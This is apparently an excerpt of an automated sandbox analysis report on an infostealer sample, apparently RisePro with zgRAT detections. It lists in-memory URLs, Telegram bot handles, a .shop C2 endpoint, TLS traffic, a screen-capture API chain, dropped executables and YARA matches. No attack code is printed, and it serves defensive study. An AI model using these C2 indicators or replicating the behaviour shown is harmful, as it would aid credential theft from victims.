Source: RegAsm.exe, 00000003.00000002.1989820350.000000000137B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000014.00000002.1941155556.0000000000DDB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://db-ip.com:443/demo/home.php?s=8.46.123.33
Source: MSIUpdaterV168.exe, 00000037.00000002.2014227672.0000000002AA3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://discord.com/api/v9/users/
Source: 6JTEmGBjvBASWeb Data.3.dr, DE7o6D8KRQYZWeb Data.3.dr, hzBvBK8Qfe_SWeb Data.3.dr, CAAEBK.24.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: 6JTEmGBjvBASWeb Data.3.dr, DE7o6D8KRQYZWeb Data.3.dr, hzBvBK8Qfe_SWeb Data.3.dr, CAAEBK.24.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: 6JTEmGBjvBASWeb Data.3.dr, DE7o6D8KRQYZWeb Data.3.dr, hzBvBK8Qfe_SWeb Data.3.dr, CAAEBK.24.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: RegAsm.exe, RegAsm.exe, 00000014.00000002.1940927301.0000000000D69000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000014.00000002.1941155556.0000000000DDB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000014.00000002.1941155556.0000000000DC0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000014.00000002.1941155556.0000000000DB4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ipinfo.io/
Source: RegAsm.exe, 00000003.00000002.1989820350.0000000001361000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000014.00000002.1941155556.0000000000DC0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ipinfo.io/Mozilla/5.0
Source: zyJWi2vy29.exe, 00000000.00000002.1793391984.0000000000350000.00000004.00000001.01000000.00000003.sdmp, 6p7a7injLZJojhETBNhL.exe, 0000000A.00000002.1873810706.0000000000700000.00000004.00000001.01000000.00000006.sdmp, MSIUpdaterV168.exe, 0000000C.00000002.2022435197.0000000000150000.00000004.00000001.01000000.00000007.sdmp, MSIUpdaterV168.exe, 0000000E.00000002.1980283521.0000000000150000.00000004.00000001.01000000.00000007.sdmp, RegAsm.exe, 00000014.00000002.1940536780.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://ipinfo.io/https://www.maxmind.com/en/locate-my-ip-addressWs2_32.dll
Source: RegAsm.exe, 00000014.00000002.1940927301.0000000000D69000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ipinfo.io/t_
Source: RegAsm.exe, 00000003.00000002.1989820350.0000000001337000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1989315863.00000000012DA000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000014.00000002.1941155556.0000000000D97000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ipinfo.io/widget/demo/8.46.123.33
Source: RegAsm.exe, 00000014.00000002.1940927301.0000000000D3A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ipinfo.io/widget/demo/8.46.123.332
Source: RegAsm.exe, 00000003.00000002.1989820350.0000000001337000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ipinfo.io/widget/demo/8.46.123.336&
Source: RegAsm.exe, 00000003.00000002.1989820350.0000000001361000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000014.00000002.1941155556.0000000000DC0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ipinfo.io:443/widget/demo/8.46.123.33
Source: RegAsm.exe, 00000026.00000002.2004626738.00000000013C9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://potterryisiw.shop/
Source: RegAsm.exe, 00000026.00000002.2004626738.00000000013C9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://potterryisiw.shop/5
Source: RegAsm.exe, 00000026.00000002.2003589511.0000000001335000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000026.00000002.2005073525.0000000003648000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000026.00000002.2004626738.00000000013C9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://potterryisiw.shop/api
Source: RegAsm.exe, 00000026.00000002.2003589511.0000000001335000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://potterryisiw.shop/api1
Source: RegAsm.exe, 00000026.00000002.2004626738.00000000013C9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://potterryisiw.shop/apiB
Source: RegAsm.exe, 00000026.00000002.2004626738.00000000013C9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://potterryisiw.shop/apip
Source: RegAsm.exe, 00000026.00000002.2004278407.0000000001398000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://potterryisiw.shop/l
Source: RegAsm.exe, 00000026.00000002.2005370628.00000000036CE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://potterryisiw.shop/pi
Source: 8x9h3ctqkpfTu0sNF0X2.exe, 00000016.00000002.1886573131.0000000000E64000.00000004.00000001.01000000.00000008.sdmp, MSIUpdaterV168.exe, 00000022.00000002.2029351588.00000000004F4000.00000004.00000001.01000000.0000000A.sdmp, MSIUpdaterV168.exe, 00000024.00000002.1988085776.00000000004F4000.00000004.00000001.01000000.0000000A.sdmp, RegAsm.exe, 00000033.00000002.2939944495.0000000000425000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199707802586
Source: 8x9h3ctqkpfTu0sNF0X2.exe, 00000016.00000002.1886573131.0000000000E64000.00000004.00000001.01000000.00000008.sdmp, MSIUpdaterV168.exe, 00000022.00000002.2029351588.00000000004F4000.00000004.00000001.01000000.0000000A.sdmp, MSIUpdaterV168.exe, 00000024.00000002.1988085776.00000000004F4000.00000004.00000001.01000000.0000000A.sdmp, RegAsm.exe, 00000033.00000002.2939944495.0000000000425000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199707802586hellosqlt.dllsqlite3.dll
Source: D87fZN3R3jFeplaces.sqlite.3.dr	String found in binary or memory: https://support.mozilla.org
Source: D87fZN3R3jFeplaces.sqlite.3.dr	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: D87fZN3R3jFeplaces.sqlite.3.dr	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
Source: RegAsm.exe, 00000018.00000002.2939946030.0000000000445000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000018.00000002.2948137481.0000000019B2D000.00000004.00000020.00020000.00000000.sdmp, SrAt_MHzXgCcHistory.3.dr, 5INc0tVFPkNMHistory.3.dr, BAFCGI.24.dr	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: SrAt_MHzXgCcHistory.3.dr, 5INc0tVFPkNMHistory.3.dr, BAFCGI.24.dr	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
Source: RegAsm.exe, 00000018.00000002.2939946030.0000000000445000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016ost.exe
Source: RegAsm.exe, 00000018.00000002.2939946030.0000000000445000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000018.00000002.2948137481.0000000019B2D000.00000004.00000020.00020000.00000000.sdmp, SrAt_MHzXgCcHistory.3.dr, 5INc0tVFPkNMHistory.3.dr, BAFCGI.24.dr	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: SrAt_MHzXgCcHistory.3.dr, 5INc0tVFPkNMHistory.3.dr, BAFCGI.24.dr	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
Source: RegAsm.exe, 00000018.00000002.2939946030.0000000000445000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17rer.exe
Source: RegAsm.exe, 00000018.00000002.2942958827.000000000135F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.me/=N
Source: RegAsm.exe, 00000018.00000002.2942958827.000000000135F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.me/ON
Source: RegAsm.exe, 00000014.00000002.1940927301.0000000000D3A000.00000004.00000020.00020000.00000000.sdmp, Wb7RPsmWU0j98XyD1Ncm8BU.zip.3.dr	String found in binary or memory: https://t.me/RiseProSUPPORT
Source: RegAsm.exe, 00000018.00000002.2942958827.000000000135F000.00000004.00000020.00020000.00000000.sdmp, MSIUpdaterV168.exe, 00000022.00000002.2029351588.00000000004F4000.00000004.00000001.01000000.0000000A.sdmp, MSIUpdaterV168.exe, 00000024.00000002.1988085776.00000000004F4000.00000004.00000001.01000000.0000000A.sdmp, RegAsm.exe, 00000033.00000002.2939944495.0000000000425000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://t.me/g067n
Source: RegAsm.exe, 00000018.00000002.2942958827.000000000135F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.me/g067nDJ
Source: 8x9h3ctqkpfTu0sNF0X2.exe, 00000016.00000002.1886573131.0000000000E64000.00000004.00000001.01000000.00000008.sdmp, MSIUpdaterV168.exe, 00000022.00000002.2029351588.00000000004F4000.00000004.00000001.01000000.0000000A.sdmp, MSIUpdaterV168.exe, 00000024.00000002.1988085776.00000000004F4000.00000004.00000001.01000000.0000000A.sdmp, RegAsm.exe, 00000033.00000002.2939944495.0000000000425000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://t.me/g067nry1neMozilla/5.0
Source: RegAsm.exe, 00000014.00000002.1941155556.0000000000DDB000.00000004.00000020.00020000.00000000.sdmp, passwords.txt.3.dr	String found in binary or memory: https://t.me/risepro_bot
Source: RegAsm.exe, 00000003.00000002.1989820350.00000000013AC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.me/risepro_bot3320
Source: RegAsm.exe, 00000003.00000002.1989820350.00000000013AC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.me/risepro_botcomy0I
Source: RegAsm.exe, 00000014.00000002.1941155556.0000000000DDB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.me/risepro_botisepro_bot
Source: RegAsm.exe, 00000014.00000002.1941155556.0000000000DDB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.me/risepro_botrisepro
Source: RegAsm.exe, 00000014.00000002.1941155556.0000000000DDB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.me/risepro_botv:#
Source: RegAsm.exe, 00000018.00000002.2942958827.000000000135F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://web.telegram.org
Source: 6JTEmGBjvBASWeb Data.3.dr, DE7o6D8KRQYZWeb Data.3.dr, hzBvBK8Qfe_SWeb Data.3.dr, CAAEBK.24.dr	String found in binary or memory: https://www.ecosia.org/newtab/
Source: 6JTEmGBjvBASWeb Data.3.dr, DE7o6D8KRQYZWeb Data.3.dr, hzBvBK8Qfe_SWeb Data.3.dr, CAAEBK.24.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: RegAsm.exe	String found in binary or memory: https://www.maxmind.com/en/locate-my-ip-address
Source: D87fZN3R3jFeplaces.sqlite.3.dr	String found in binary or memory: https://www.mozilla.org
Source: D87fZN3R3jFeplaces.sqlite.3.dr	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
Source: D87fZN3R3jFeplaces.sqlite.3.dr	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
Source: RegAsm.exe, 00000003.00000002.1989820350.00000000013AC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1990536151.0000000005779000.00000004.00000020.00020000.00000000.sdmp, Firefox_fqs92o4p.default-release.txt.3.dr	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
Source: RegAsm.exe, 00000003.00000002.1990536151.0000000005779000.00000004.00000020.00020000.00000000.sdmp, 3b6N2Xdh3CYwplaces.sqlite.3.dr, D87fZN3R3jFeplaces.sqlite.3.dr	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: D87fZN3R3jFeplaces.sqlite.3.dr	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: RegAsm.exe, 00000003.00000002.1989820350.00000000013AC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1990536151.0000000005779000.00000004.00000020.00020000.00000000.sdmp, Firefox_fqs92o4p.default-release.txt.3.dr	String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: RegAsm.exe, 00000003.00000002.1990536151.0000000005779000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/alletsoF
Source: RegAsm.exe, 00000003.00000002.1990536151.0000000005779000.00000004.00000020.00020000.00000000.sdmp, 3b6N2Xdh3CYwplaces.sqlite.3.dr, D87fZN3R3jFeplaces.sqlite.3.dr	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49788
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49821
Source: unknown	Network traffic detected: HTTP traffic on port 49817 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49813 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49781
Source: unknown	Network traffic detected: HTTP traffic on port 49789 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49781 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49795 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49826 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49818
Source: unknown	Network traffic detected: HTTP traffic on port 49799 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49810 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49817
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49816
Source: unknown	Network traffic detected: HTTP traffic on port 49791 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49814
Source: unknown	Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49813
Source: unknown	Network traffic detected: HTTP traffic on port 49772 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49811
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49777
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49810
Source: unknown	Network traffic detected: HTTP traffic on port 49816 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49774
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49772
Source: unknown	Network traffic detected: HTTP traffic on port 49788 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49806 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49830 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49806
Source: unknown	Network traffic detected: HTTP traffic on port 49777 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49804
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49768
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown	Network traffic detected: HTTP traffic on port 49821 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49828 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49793 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49797 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49824 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49831 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown	Network traffic detected: HTTP traffic on port 49774 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49799
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49832
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49831
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49797
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49830
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49795
Source: unknown	Network traffic detected: HTTP traffic on port 49818 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49793
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49792
Source: unknown	Network traffic detected: HTTP traffic on port 49814 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49822 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49791
Source: unknown	Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49765 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49804 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49768 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49832 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49811 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49828
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49826
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown	Network traffic detected: HTTP traffic on port 49792 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49824
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49789
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49822

Source: unknown	HTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.4:49748 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.4.15:443 -> 192.168.2.4:49749 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49759 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.4:49760 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49761 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.4:49762 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.4.15:443 -> 192.168.2.4:49765 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49766 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49768 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49772 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49774 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49777 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49781 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49788 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49789 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.4:49791 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.4:49792 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.4.15:443 -> 192.168.2.4:49793 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.4.15:443 -> 192.168.2.4:49795 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49797 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49799 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49804 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49806 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.4:49810 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49811 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49813 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.4.15:443 -> 192.168.2.4:49814 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49816 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49817 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49818 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49821 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49822 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49824 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49826 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49828 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49830 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49831 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49832 version: TLS 1.2

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 24_2_00413160 GetDesktopWindow,GetWindowRect,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,GlobalFix,GlobalSize,SelectObject,DeleteObject,DeleteObject,ReleaseDC,CloseWindow,

24_2_00413160

Source: MSIUpdaterV168.exe, 0000002E.00000002.2014079426.0000000003499000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: GetRawInputData

memstr_16860042-9

System Summary

Malicious sample detected (through community Yara rule)

Source: 46.0.MSIUpdaterV168.exe.f50000.0.unpack, type: UNPACKEDPE	Matched rule: Detects zgRAT Author: ditekSHen
Source: Process Memory Space: 8x9h3ctqkpfTu0sNF0X2.exe PID: 7268, type: MEMORYSTR	Matched rule: Detects Molerats sample - July 2017 Author: Florian Roth
Source: Process Memory Space: MSIUpdaterV168.exe PID: 2504, type: MEMORYSTR	Matched rule: Detects Molerats sample - July 2017 Author: Florian Roth
Source: Process Memory Space: MSIUpdaterV168.exe PID: 7744, type: MEMORYSTR	Matched rule: Detects Molerats sample - July 2017 Author: Florian Roth
Source: C:\ProgramData\MSIUpdaterV168_6a6c6289978e81e233ec951dd09be6ea\MSIUpdaterV168.exe, type: DROPPED	Matched rule: Detects zgRAT Author: ditekSHen
Source: C:\Users\user\AppData\Local\AdobeUpdaterV168_6a6c6289978e81e233ec951dd09be6ea\AdobeUpdaterV168.exe, type: DROPPED	Matched rule: Detects zgRAT Author: ditekSHen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\meta2806[1].exe, type: DROPPED	Matched rule: Detects zgRAT Author: ditekSHen
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe, type: DROPPED	Matched rule: Detects zgRAT Author: ditekSHen

Source: C:\Users\user\Desktop\zyJWi2vy29.exe	Code function: 0_2_00344920	0_2_00344920
Source: C:\Users\user\Desktop\zyJWi2vy29.exe	Code function: 0_2_00334869	0_2_00334869
Source: C:\Users\user\Desktop\zyJWi2vy29.exe	Code function: 0_2_0033E8C8	0_2_0033E8C8
Source: C:\Users\user\Desktop\zyJWi2vy29.exe	Code function: 0_2_0032DAB4	0_2_0032DAB4
Source: C:\Users\user\Desktop\zyJWi2vy29.exe	Code function: 0_2_00335289	0_2_00335289
Source: C:\Users\user\Desktop\zyJWi2vy29.exe	Code function: 0_2_00330B00	0_2_00330B00
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\6p7a7injLZJojhETBNhL.exe	Code function: 10_2_006F4920	10_2_006F4920
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\6p7a7injLZJojhETBNhL.exe	Code function: 10_2_006E4869	10_2_006E4869
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\6p7a7injLZJojhETBNhL.exe	Code function: 10_2_006EE8C8	10_2_006EE8C8
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\6p7a7injLZJojhETBNhL.exe	Code function: 10_2_006DDAB4	10_2_006DDAB4
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\6p7a7injLZJojhETBNhL.exe	Code function: 10_2_006E5289	10_2_006E5289
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\6p7a7injLZJojhETBNhL.exe	Code function: 10_2_006E0B00	10_2_006E0B00
Source: C:\ProgramData\MSIUpdaterV168_6a6c6289978e81e233ec951dd09be6ea\MSIUpdaterV168.exe	Code function: 12_2_00144920	12_2_00144920
Source: C:\ProgramData\MSIUpdaterV168_6a6c6289978e81e233ec951dd09be6ea\MSIUpdaterV168.exe	Code function: 12_2_00134869	12_2_00134869
Source: C:\ProgramData\MSIUpdaterV168_6a6c6289978e81e233ec951dd09be6ea\MSIUpdaterV168.exe	Code function: 12_2_0013E8C8	12_2_0013E8C8
Source: C:\ProgramData\MSIUpdaterV168_6a6c6289978e81e233ec951dd09be6ea\MSIUpdaterV168.exe	Code function: 12_2_00135289	12_2_00135289
Source: C:\ProgramData\MSIUpdaterV168_6a6c6289978e81e233ec951dd09be6ea\MSIUpdaterV168.exe	Code function: 12_2_0012DAB4	12_2_0012DAB4
Source: C:\ProgramData\MSIUpdaterV168_6a6c6289978e81e233ec951dd09be6ea\MSIUpdaterV168.exe	Code function: 12_2_00130B00	12_2_00130B00
Source: C:\ProgramData\MSIUpdaterV168_6a6c6289978e81e233ec951dd09be6ea\MSIUpdaterV168.exe	Code function: 12_2_00123D50	12_2_00123D50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 20_2_0044002D	20_2_0044002D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 20_2_005220D0	20_2_005220D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 20_2_004F60E0	20_2_004F60E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 20_2_00493080	20_2_00493080
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 20_2_00508120	20_2_00508120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 20_2_004371A0	20_2_004371A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 20_2_005031A0	20_2_005031A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 20_2_0040A2C0	20_2_0040A2C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 20_2_0050A2B0	20_2_0050A2B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 20_2_0044036F	20_2_0044036F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 20_2_004A4320	20_2_004A4320
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 20_2_00490440	20_2_00490440
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 20_2_004F0450	20_2_004F0450
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 20_2_004FA480	20_2_004FA480
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 20_2_00514550	20_2_00514550
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 20_2_0053F550	20_2_0053F550
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 20_2_004F85F0	20_2_004F85F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 20_2_0042F580	20_2_0042F580
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 20_2_0048F590	20_2_0048F590
